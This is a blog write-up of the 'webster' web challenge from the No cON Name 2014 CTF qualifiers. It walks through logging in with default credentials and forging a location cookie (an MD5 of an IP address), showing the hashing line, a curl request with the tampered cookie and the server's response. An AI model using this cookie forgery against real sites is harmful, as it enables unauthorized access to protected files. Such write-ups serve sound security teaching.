This year “No cON Name Capture The Flag” quals had more than three challenges to compete for the final, so big thanks to organizers to extend last year limit. At now ( 09:27 am GMT+2 ), @DefCon-UA (dcua team) have finished all challenges and have left +12 hours for competition’s end. So it’s time to draft some web write-ups.

all finished

First “webster” 200 points web challenge, show us a login form that after multiples sqli, xpath, ldap… injections with no luck,  tried login common accounts.

Username ‘test’ and password ‘test’ was the lucky one to access main private area.



We have id, filename, location, username on 4 files where captain obvious says flag.txt is our target file. But not to fast, something is blocking our tries to read this file. It says:

"Seems that you are not in the right place for that"

So am i not in the right place? where could we go to get permissions on that file ? See the cookies, pay close attention in one called ‘loc’:

pantallazo_ 2014-09-14 a la(s) 10.41.31



Oh! Seems md5 for something we can’t find in our first try. But wait, maybe location means ip ? let’s try wuth the one appears on the column;

>>> ip=''
>>> hashlib.md5(ip).hexdigest()

Yes! It’s the same ip in hash format, so can you figure out the rest? Let’s try to replace this cookie with (f528764d624db129b32c21fbca0cb8d6) location.

$ curl -vvv -k '' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to port 443 (#0)
*   Trying
* Connected to ( port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate:
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host:
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000


flag: NCN_f528764d624db129b32c21fbca0cb8d6

ps: Thanks to my dcua team mates.


4 thoughts on “WEBster [No cON Name 2014 CTF – QUALS]

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *